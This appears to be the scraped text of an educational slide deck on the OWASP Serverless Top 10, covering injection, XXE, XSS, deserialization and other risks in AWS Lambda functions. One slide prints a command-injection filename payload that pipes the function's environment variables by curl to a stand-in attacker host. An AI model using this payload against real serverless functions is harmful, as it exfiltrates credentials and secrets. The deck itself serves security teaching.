OWASP Serverless Top 10

C
Chandrapal Badshah
Serverless Top 10 INTRODUCTION TO
About me Chandrapal Badshah Security Enthusiast Build, Break, Build guy Would love to talk about plants ;) Contact: ● twitter.com/@bnchandrapal ● github.com/Chan9390
START WITH WHY - Simon Sinek
Once upon a time... Database Web Server CPU Memory Web Application Static Files
But ... Database Web Server CPU Memory Web Application Static Files
But ... Database Web Server CPU Memory Web Application Static Files Security: maintaining/updating operating system with security patches, WAF/firewall configuration, network monitoring, etc
CHANGED THE GAME
Introduction to Microservices
Introduction to Microservices Still a lot of manual work (depending on the deployment method) to scale it. Security tasks depend on the deployment method too.
Introduction to Serverless The phrase “serverless” doesn’t mean servers are no longer involved. It simply means that developers no longer have to think that much about them. Computing resources get used as services without having to manage around physical capabilities or limits. https://readwrite.com/2012/10/15/why-the-future-of-software-and-apps-is-serverless/
Introduction to Serverless https://martinfowler.com/bliki/Serverless.html
Cloud Providers
Serverless Tools & Frameworks
Who uses Serverless (AWS Lambda) https://aws.amazon.com/lambda/resources/customer-case-studies/
Features of Function-as-a-Service ➔ Stateless functions ➔ Complete abstraction ➔ Instant, Scalable and event-driven ➔ Pay for what you use ➔ Free trials (AWS lambda gives 1,000,000* lambda triggers for free every month) ➔ There is a default timeout ➔ The function guidelines are defined by the Cloud Service Provider ➔ Multiple Languages supported
DEMO - Deploying Serverless App
So simple right ?
What if … ?
OWASP Serverless Top 10
One question ?
Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ?
Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ? ● The way the apps are created are similar to that of server based applications ● There’s not a lot of data from organizations on how they use serverless functions in production (and the security issues faced)
Let’s jump into OWASP Serverless Top 10
A1: Injection ● Serverless doesn’t only support HTTP triggers, they support cloud storage events, database changes, etc ● SQL/NoSQL injection ● OS Command Injection ● Code Injection - the severity depends on the permissions given to the vulnerable lambda function
An example scenario: CV filtering system User sends mail with CV attached Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it if there’s a PDF attachment
Can you see the bug ?
Checks if the file has file name Checks if the filename ends with .pdf Appends the filename with /tmp Executes a command pdftotext
Payload (to print the environment variables) foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf
A2: Broken Authentication ● Functions are Stateless ● Multiple entry points, services, events and triggers and no continuous flow - things can get worse ● Common example: the functions for internal use only are available to all
A3: Sensitive Data Exposure ● Depends on the architecture just like other server based applications ● Common example: having functions disclosing logs in some specific endpoint
A bug I recently found
A4: XML External Entity ● Insecure way of parsing XML files by the serverless function ● The exploitability may not always be fruitful
Vulnerable code …
Vulnerable code … Downloads the XML file from bucket and parses it.
The Payload ...
The result…
A5: Broken Access Control ● Functions with over privileges ● If functions are allowed to access anything on the cloud account, then attacker too if he exploits some vulnerability like code execution
A6: Security Misconfiguration ● Not just the function but how the function interacts with the environment ● Because of the complexity which is introduced due to increased features/functions, it’s very easy for security misconfiguration ● Can lead to DoS/timeouts ● Example: Public S3 buckets
A7: Cross Site Scripting (XSS) ● Most common bug affects serverless functions as well ● Mostly due to lack of user input sanitization
Find the bug… (scenario) User sends mail Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it and sends the message content to moderator dashboard
Find the bug…
Find the bug… Gets the message content Sends the message content to dashboard
OWASP Serverless Top 10
A8: Insecure Deserialization ● Common in Python and NodeJS, but also affects Java and dotNET ● Mostly introduced due to insecure use of 3rd party libraries
Example Java payload
The payload in request…
And the result…
A9: Using components with known vulnerabilities ● Using dependencies which are insecure ● Most commonly found ● Not every vulnerability will affect serverless functions ● Doesn’t always guarantee you remote exploitation
A10: Insufficient Logging and Monitoring ● Serverless auditing is even more difficult than traditional web applications ● Since the client interacts directly with the serverless functions there is no place for implementing WAFs or any active monitoring systems ● This actually helps attackers
Lambda code
Lambda logs
Lambda Logs (in case of huge payload)
Resources OWASP Serverless Top 10: https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project OWASP Serverless Top 10 GitHub repo: https://github.com/OWASP/Serverless-Top-10-Project Serverless Security - Function-as-a-Service: https://www.youtube.com/watch?v=c5ZHPc_yG4g Securing Serverless Applications Step-by-step: https://www.youtube.com/watch?v=B3j4xql7we0 AWS Serverless Functions: https://github.com/aws-samples/aws-serverless-workshops PureSec Serverless Top 10: https://github.com/puresec/sas-top-10
Stay tuned ! Damn Vulnerable Serverless App on its way
Any Questions ?
1 of 55

OWASP Serverless Top 10

Download to read offline
Software

Presentation that introduces Serverless technology and gives a glimpse of all the OWASP Serverless Top 10 vulnerabilities with code examples.

C
Chandrapal Badshah

Recommended

pwnd.shpwnd.sh
pwnd.shChandrapal Badshah
487 views28 slides
mod_security introduction at study2study #3mod_security introduction at study2study #3
mod_security introduction at study2study #3Naoya Nakazawa
2.3K views31 slides
Node JS reverse shellNode JS reverse shell
Node JS reverse shellMadhu Akula
4.9K views23 slides
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Rahul
1.1K views29 slides
Automated Intrusion Detection and Response on AWSAutomated Intrusion Detection and Response on AWS
Automated Intrusion Detection and Response on AWSTeri Radichel
618 views15 slides
Apache Struts2 CVE-2017-5638Apache Struts2 CVE-2017-5638
Apache Struts2 CVE-2017-5638Riyaz Walikar
565 views11 slides

More Related Content

What's hot

Nodejs SecurityNodejs Security
Nodejs SecurityJason Ross
293 views22 slides

What's hot(20)

Locking Down Your CloudLocking Down Your Cloud
Locking Down Your Cloud
Teri Radichel415 views
Windows Security Crash CourseWindows Security Crash Course
Windows Security Crash Course
UTD Computer Security Group501 views
Null bhopal Sep 2016: What it Takes to Secure a Web ApplicationNull bhopal Sep 2016: What it Takes to Secure a Web Application
Null bhopal Sep 2016: What it Takes to Secure a Web Application
Anant Shrivastava4.1K views
[Wroclaw #7] AWS (in)security - the devil is in the detail[Wroclaw #7] AWS (in)security - the devil is in the detail
[Wroclaw #7] AWS (in)security - the devil is in the detail
OWASP187 views
Nodejs SecurityNodejs Security
Nodejs Security
Jason Ross293 views
Web Application firewall-Mod securityWeb Application firewall-Mod security
Web Application firewall-Mod security
Romansh Yadav674 views
Mod SecurityMod Security
Mod Security
Abhishek Singh1.1K views
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application security
James Crowley102 views
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Modern Security Operations aka Secure DevOps @ All Day DevOps 2017
Madhu Akula2.9K views
Equifax cyber attack contained by containersEquifax cyber attack contained by containers
Equifax cyber attack contained by containers
Aqua Security2K views
AWS Security StrategyAWS Security Strategy
AWS Security Strategy
Teri Radichel1.5K views
20 common security vulnerabilities and misconfiguration in Azure20 common security vulnerabilities and misconfiguration in Azure
20 common security vulnerabilities and misconfiguration in Azure
Cheah Eng Soon716 views
Infrastructure SecurityInfrastructure Security
Infrastructure Security
UTD Computer Security Group179 views
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Microsoft Ignite session: Look under the hood: bypassing antimalware tactics ...
Paula Januszkiewicz2.6K views
[Wroclaw #7] Why So Serial?[Wroclaw #7] Why So Serial?
[Wroclaw #7] Why So Serial?
OWASP463 views
How to create correlation rule for threat detection in RuSIEMHow to create correlation rule for threat detection in RuSIEM
How to create correlation rule for threat detection in RuSIEM
Olesya Shelestova421 views
[Wroclaw #7] Security test automation[Wroclaw #7] Security test automation
[Wroclaw #7] Security test automation
OWASP162 views
Linux Security for DevelopersLinux Security for Developers
Linux Security for Developers
Michael Boelen3.4K views
Web Security Introduction Webserver hacking refers to ...Web Security Introduction Webserver hacking refers to ...
Web Security Introduction Webserver hacking refers to ...
webhostingguy381 views
Web security: concepts and tools used by attackersWeb security: concepts and tools used by attackers
Web security: concepts and tools used by attackers
tomasperezv634 views

Similar to OWASP Serverless Top 10

demo1demo1
demo1googli
308 views20 slides

Similar to OWASP Serverless Top 10(20)

demo1demo1
demo1
googli308 views
Web Security Programming I IWeb Security Programming I I
Web Security Programming I I
Pavu Jas456 views
Web security programming_iiWeb security programming_ii
Web security programming_ii
googli2 views
Web security programming_iiWeb security programming_ii
Web security programming_ii
googli337 views
Comparison Between P2P, Client And Server And...Comparison Between P2P, Client And Server And...
Comparison Between P2P, Client And Server And...
Marisela Stone3 views
DevSecCon Tel Aviv 2018 - Serverless SecurityDevSecCon Tel Aviv 2018 - Serverless Security
DevSecCon Tel Aviv 2018 - Serverless Security
Avi Shulman115 views
Layer 7 Technologies: Web Services Hacking And HardeningLayer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
CA API Management2.9K views
Web HackingWeb Hacking
Web Hacking
Information Technology13.2K views
Docebo: history of a journey from legacy to serverlessDocebo: history of a journey from legacy to serverless
Docebo: history of a journey from legacy to serverless
AWS User Group Italy138 views
Start Up Austin 2017: Security Crash Course and Best PraticesStart Up Austin 2017: Security Crash Course and Best Pratices
Start Up Austin 2017: Security Crash Course and Best Pratices
Amazon Web Services312 views
Going Serverless on AWSGoing Serverless on AWS
Going Serverless on AWS
Aleksandr Maklakov258 views
Cloud Computing basicCloud Computing basic
Cloud Computing basic
Himanshu Pareek439 views
Operations: SecurityOperations: Security
Operations: Security
Amazon Web Services238 views
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Serhiy Kalinets "Embracing architectural challenges in the modern .NET world"
Fwdays205 views
DevSecCon Boston 2018: Inside an enterprise breach by Sam BisbeeDevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
DevSecCon Boston 2018: Inside an enterprise breach by Sam Bisbee
DevSecCon87 views
Security in the cloud Workshop HSTC 2014Security in the cloud Workshop HSTC 2014
Security in the cloud Workshop HSTC 2014
Akash Mahajan1.5K views
Serverless meetup Auckland #6Serverless meetup Auckland #6
Serverless meetup Auckland #6
Myles Henaghan324 views
Pentesting With Web Services in 2012Pentesting With Web Services in 2012
Pentesting With Web Services in 2012
Ishan Girdhar3K views
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
DevOps, Continuous Integration and Deployment on AWS: Putting Money Back into...
Amazon Web Services11K views
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Devops continuousintegration and deployment onaws puttingmoneybackintoyourmis...
Emerson Eduardo Rodrigues Von Staffen60 views

More from Chandrapal Badshah

More from Chandrapal Badshah(10)

Dangling DNS records takeover at scaleDangling DNS records takeover at scale
Dangling DNS records takeover at scale
Chandrapal Badshah536 views
Detecting secrets in code committed to gitlab (in real time)Detecting secrets in code committed to gitlab (in real time)
Detecting secrets in code committed to gitlab (in real time)
Chandrapal Badshah834 views
How to get started in InfoSec ?How to get started in InfoSec ?
How to get started in InfoSec ?
Chandrapal Badshah568 views
OSINT mindset to protect your organization - Null monthly meet versionOSINT mindset to protect your organization - Null monthly meet version
OSINT mindset to protect your organization - Null monthly meet version
Chandrapal Badshah363 views
OSINT Mindset to protect your OrganizationOSINT Mindset to protect your Organization
OSINT Mindset to protect your Organization
Chandrapal Badshah118 views
Solving OWASP MSTG CrackMe using FridaSolving OWASP MSTG CrackMe using Frida
Solving OWASP MSTG CrackMe using Frida
Chandrapal Badshah585 views
Pentesting Android Apps using Frida (Beginners)Pentesting Android Apps using Frida (Beginners)
Pentesting Android Apps using Frida (Beginners)
Chandrapal Badshah6.9K views
Let’s hunt the target using OSINTLet’s hunt the target using OSINT
Let’s hunt the target using OSINT
Chandrapal Badshah1.2K views
Web Application FirewallWeb Application Firewall
Web Application Firewall
Chandrapal Badshah3.4K views
Netcat - A Swiss Army ToolNetcat - A Swiss Army Tool
Netcat - A Swiss Army Tool
Chandrapal Badshah1.4K views

Recently uploaded

ict act 1.pptxict act 1.pptx
ict act 1.pptxsanjaniarun08
12 views17 slides

Recently uploaded(20)

.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra....NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra...
.NET Developer Conference 2023 - .NET Microservices mit Dapr – zu viel Abstra...
Marc Müller31 views
Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ...Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ...
Mark Simpson - UKOUG23 - Refactoring Monolithic Oracle Database Applications ...
marksimpsongw74 views
DSD-INT 2023 HydroMT model building and river-coast coupling in Python - Bove...DSD-INT 2023 HydroMT model building and river-coast coupling in Python - Bove...
DSD-INT 2023 HydroMT model building and river-coast coupling in Python - Bove...
Deltares15 views
Upgrading Incident Management with Icinga - Icinga Camp Milan 2023Upgrading Incident Management with Icinga - Icinga Camp Milan 2023
Upgrading Incident Management with Icinga - Icinga Camp Milan 2023
Icinga32 views
DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko...DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko...
DSD-INT 2023 Simulation of Coastal Hydrodynamics and Water Quality in Hong Ko...
Deltares9 views
ict act 1.pptxict act 1.pptx
ict act 1.pptx
sanjaniarun0812 views
HarshithAkkapelli_Presentation.pdfHarshithAkkapelli_Presentation.pdf
HarshithAkkapelli_Presentation.pdf
harshithakkapelli10 views
Winter '24 Release Chat.pdfWinter '24 Release Chat.pdf
Winter '24 Release Chat.pdf
melbourneauuser9 views
DSD-INT 2023 Delft3D FM Suite 2024.01 2D3D - New features + Improvements - Ge...DSD-INT 2023 Delft3D FM Suite 2024.01 2D3D - New features + Improvements - Ge...
DSD-INT 2023 Delft3D FM Suite 2024.01 2D3D - New features + Improvements - Ge...
Deltares11 views
DSD-INT 2023 Wave-Current Interaction at Montrose Tidal Inlet System and Its ...DSD-INT 2023 Wave-Current Interaction at Montrose Tidal Inlet System and Its ...
DSD-INT 2023 Wave-Current Interaction at Montrose Tidal Inlet System and Its ...
Deltares8 views
Les nouveautés produit Neo4j Les nouveautés produit Neo4j
Les nouveautés produit Neo4j
Neo4j26 views
MariaDB stored procedures and why they should be improvedMariaDB stored procedures and why they should be improved
MariaDB stored procedures and why they should be improved
Federico Razzoli8 views
DSD-INT 2023 Next-Generation Flood Inundation Mapping for Taiwan - Delft3D FM...DSD-INT 2023 Next-Generation Flood Inundation Mapping for Taiwan - Delft3D FM...
DSD-INT 2023 Next-Generation Flood Inundation Mapping for Taiwan - Delft3D FM...
Deltares7 views
DSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - GeertsemaDSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - Geertsema
DSD-INT 2023 Delft3D FM Suite 2024.01 1D2D - Beta testing programme - Geertsema
Deltares9 views
DSD-INT 2023 Simulating a falling apron in Delft3D 4 - Engineering Practice -...DSD-INT 2023 Simulating a falling apron in Delft3D 4 - Engineering Practice -...
DSD-INT 2023 Simulating a falling apron in Delft3D 4 - Engineering Practice -...
Deltares6 views
Citi TechTalk Session 2: Kafka Deep DiveCiti TechTalk Session 2: Kafka Deep Dive
Citi TechTalk Session 2: Kafka Deep Dive
confluent16 views
Best Mics For Your Live StreamingBest Mics For Your Live Streaming
Best Mics For Your Live Streaming
ontheflystream6 views
Roadmap y Novedades de productoRoadmap y Novedades de producto
Roadmap y Novedades de producto
Neo4j31 views
DSD-INT 2023 Dam break simulation in Derna (Libya) using HydroMT_SFINCS - PridaDSD-INT 2023 Dam break simulation in Derna (Libya) using HydroMT_SFINCS - Prida
DSD-INT 2023 Dam break simulation in Derna (Libya) using HydroMT_SFINCS - Prida
Deltares14 views
LAVADORA ROLO.docxLAVADORA ROLO.docx
LAVADORA ROLO.docx
SamuelRamirez835247 views

OWASP Serverless Top 10

  • 2. About me Chandrapal Badshah Security Enthusiast Build, Break, Build guy Would love to talk about plants ;) Contact: ● twitter.com/@bnchandrapal ● github.com/Chan9390
  • 3. START WITH WHY - Simon Sinek
  • 4. Once upon a time... Database Web Server CPU Memory Web Application Static Files
  • 6. But ... Database Web Server CPU Memory Web Application Static Files Security: maintaining/updating operating system with security patches, WAF/firewall configuration, network monitoring, etc
  • 9. Introduction to Microservices Still a lot of manual work (depending on the deployment method) to scale it. Security tasks depend on the deployment method too.
  • 10. Introduction to Serverless The phrase “serverless” doesn’t mean servers are no longer involved. It simply means that developers no longer have to think that much about them. Computing resources get used as services without having to manage around physical capabilities or limits. https://readwrite.com/2012/10/15/why-the-future-of-software-and-apps-is-serverless/
  • 13. Serverless Tools & Frameworks
  • 14. Who uses Serverless (AWS Lambda) https://aws.amazon.com/lambda/resources/customer-case-studies/
  • 15. Features of Function-as-a-Service ➔ Stateless functions ➔ Complete abstraction ➔ Instant, Scalable and event-driven ➔ Pay for what you use ➔ Free trials (AWS lambda gives 1,000,000* lambda triggers for free every month) ➔ There is a default timeout ➔ The function guidelines are defined by the Cloud Service Provider ➔ Multiple Languages supported
  • 16. DEMO - Deploying Serverless App
  • 21. Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ?
  • 22. Do you think OWASP Serverless Top 10 vulnerabilities are different than OWASP Top 10 ? ● The way the apps are created are similar to that of server based applications ● There’s not a lot of data from organizations on how they use serverless functions in production (and the security issues faced)
  • 23. Let’s jump into OWASP Serverless Top 10
  • 24. A1: Injection ● Serverless doesn’t only support HTTP triggers, they support cloud storage events, database changes, etc ● SQL/NoSQL injection ● OS Command Injection ● Code Injection - the severity depends on the permissions given to the vulnerable lambda function
  • 25. An example scenario: CV filtering system User sends mail with CV attached Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it if there’s a PDF attachment
  • 26. Can you see the bug ?
  • 27. Checks if the file has file name Checks if the filename ends with .pdf Appends the filename with /tmp Executes a command pdftotext
  • 28. Payload (to print the environment variables) foobar;env|curl -H "Content-Type: text/plain" -X POST -d @- http://attacker.site/collector #.pdf
  • 29. A2: Broken Authentication ● Functions are Stateless ● Multiple entry points, services, events and triggers and no continuous flow - things can get worse ● Common example: the functions for internal use only are available to all
  • 30. A3: Sensitive Data Exposure ● Depends on the architecture just like other server based applications ● Common example: having functions disclosing logs in some specific endpoint
  • 31. A bug I recently found
  • 32. A4: XML External Entity ● Insecure way of parsing XML files by the serverless function ● The exploitability may not always be fruitful
  • 34. Vulnerable code … Downloads the XML file from bucket and parses it.
  • 37. A5: Broken Access Control ● Functions with over privileges ● If functions are allowed to access anything on the cloud account, then attacker too if he exploits some vulnerability like code execution
  • 38. A6: Security Misconfiguration ● Not just the function but how the function interacts with the environment ● Because of the complexity which is introduced due to increased features/functions, it’s very easy for security misconfiguration ● Can lead to DoS/timeouts ● Example: Public S3 buckets
  • 39. A7: Cross Site Scripting (XSS) ● Most common bug affects serverless functions as well ● Mostly due to lack of user input sanitization
  • 40. Find the bug… (scenario) User sends mail Email reaches the server AWS SNS sends notification to Lambda Lambda gets the mail, parses it and sends the message content to moderator dashboard
  • 42. Find the bug… Gets the message content Sends the message content to dashboard
  • 44. A8: Insecure Deserialization ● Common in Python and NodeJS, but also affects Java and dotNET ● Mostly introduced due to insecure use of 3rd party libraries
  • 46. The payload in request…
  • 48. A9: Using components with known vulnerabilities ● Using dependencies which are insecure ● Most commonly found ● Not every vulnerability will affect serverless functions ● Doesn’t always guarantee you remote exploitation
  • 49. A10: Insufficient Logging and Monitoring ● Serverless auditing is even more difficult than traditional web applications ● Since the client interacts directly with the serverless functions there is no place for implementing WAFs or any active monitoring systems ● This actually helps attackers
  • 52. Lambda Logs (in case of huge payload)
  • 53. Resources OWASP Serverless Top 10: https://www.owasp.org/index.php/OWASP_Serverless_Top_10_Project OWASP Serverless Top 10 GitHub repo: https://github.com/OWASP/Serverless-Top-10-Project Serverless Security - Function-as-a-Service: https://www.youtube.com/watch?v=c5ZHPc_yG4g Securing Serverless Applications Step-by-step: https://www.youtube.com/watch?v=B3j4xql7we0 AWS Serverless Functions: https://github.com/aws-samples/aws-serverless-workshops PureSec Serverless Top 10: https://github.com/puresec/sas-top-10
  • 54. Stay tuned ! Damn Vulnerable Serverless App on its way

Editor's Notes

  1. The control was with the server. (Give example, cookie is still serverside in serverless)
  2. The control was with the server. (Give example, cookie is still serverside in serverless)
  3. The control was with the server. (Give example, cookie is still serverside in serverless)